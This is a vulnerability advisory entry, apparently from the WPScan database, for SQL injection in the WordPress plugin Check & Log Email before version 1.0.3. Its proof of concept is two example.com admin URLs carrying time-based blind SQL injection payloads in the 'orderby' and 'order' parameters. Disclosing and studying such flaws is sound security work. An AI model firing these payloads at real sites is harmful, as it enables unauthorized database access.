Lucene search

K
wpvulndbAnton SarsadskikhWPVDB-ID:F80EF09A-D3E2-4D62-8532-F0EBE59AE110
HistorySep 27, 2021 - 12:00 a.m.

Check & Log Email < 1.0.3 - Admin+ SQL Injections

2021-09-2700:00:00
Anton Sarsadskikh
wpscan.com
11
email security
sql injection
plugin vulnerability

EPSS

0.001

Percentile

37.2%

The plugin does not validate and escape the “order” and “orderby” GET parameters before using them in a SQL statement when viewing logs, leading to SQL injections issues

PoC

With the ‘Enable Log’ settings (of the plugin) activated: - https://example.com/wp-admin/admin.php?page=check-email-logs&amp;orderby;=sent_date+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)&order;=DESC - https://example.com/wp-admin/admin.php?page=check-email-logs&amp;orderby;=sent_date&amp;order;=+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)

EPSS

0.001

Percentile

37.2%

Related for WPVDB-ID:F80EF09A-D3E2-4D62-8532-F0EBE59AE110